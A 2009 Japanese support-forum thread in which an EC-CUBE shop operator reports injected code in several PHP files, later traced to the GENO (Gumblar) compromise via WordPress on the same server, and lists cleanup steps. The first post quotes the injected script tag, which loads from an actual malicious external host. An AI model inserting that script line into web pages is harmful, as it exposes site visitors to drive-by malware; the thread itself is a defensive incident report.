質問 > その他 > ソースコードを改竄されました |
その他
スレッド表示 | 新しいものから | 前のトピック | 次のトピック | 下へ |
投稿者 | スレッド |
---|---|
hiki777 |
投稿日時: 2009/12/17 0:09
対応状況: −−−
|
新米 登録日: 2009/12/16 居住地: 投稿: 3 |
ソースコードを改竄されました 私が管理してるサイトでソースコードの改竄を受けた模様です。
GoogleDesktopの警告画面で気づいたのですが cart/index.php order/index.php mypage/login.php の先頭にbase64エンコードを用いて <script src=http://PIZZA.m92.biz/admin/stylesheet.php ></script> 注:ピザの部分は本来は小文字ですが、アクセスしないでください!! のコードが埋め込まれていました。 これは、先のV2.4.1の「顧客情報漏洩の脆弱性について」に起因するものと考えてよいのでしょうか? それとも、全く別のものでしょうか? こういった外部からの攻撃を初めて受けたので正直なところ動揺しています。 アドバイス等がございましたら是非教えてください。 よろしくお願いします。 |
hiki777 |
投稿日時: 2009/12/17 4:28
対応状況: −−−
|
新米 登録日: 2009/12/16 居住地: 投稿: 3 |
Re: ソースコードを改竄されました すいません。自己レスです。
調べていくとEC-CUBEでなく、同一サーバーにある Wordpressのクラッキングが発端のようです。 |
seasoft |
投稿日時: 2009/12/17 21:34
対応状況: −−−
|
神 登録日: 2008/6/4 居住地: 投稿: 7369 |
Re: ソースコードを改竄されました どうでも良い突っ込みですが・・・
> 注:ピザの部分は本来は小文字ですが、アクセスしないでください!! ホスト名の部分は、大文字小文字関係なくアクセスできます。 さらに、Firefox は 全角→半角 の変換まで、してくれちゃうようです
|
hiki777 |
投稿日時: 2009/12/18 14:16
対応状況: 解決済
|
新米 登録日: 2009/12/16 居住地: 投稿: 3 |
Re: ソースコードを改竄されました > ホスト名の部分は、大文字小文字関係なくアクセスできます。
> さらに、Firefox は 全角→半角 の変換まで、してくれちゃうようです 大変失礼しました。 実際に対象となるファイルは無効化されているらしく ウィルスが拡散することはないようです。 以下。事後報告です。 今回の現象は、いわゆるGENOウィルスによる改ざんでした。 EC-CUBEのソースコードも70ファイル以上に渡って被害がありました。 現状ではDB内部への攻撃はありませんでした。 対応としては 客先のクライアントPCのウィルス除去 サーバーソースコードのバックアップファイルによる復旧 及びソースコードの検証。 具体的には、unescape、eval、replaceなどの文字列検索 サーバーの安全性についてGREDチェッカーなどで定期的に確認する必要がありますね。 http://www.gred.jp/ |
スレッド表示 | 新しいものから | 前のトピック | 次のトピック | トップ |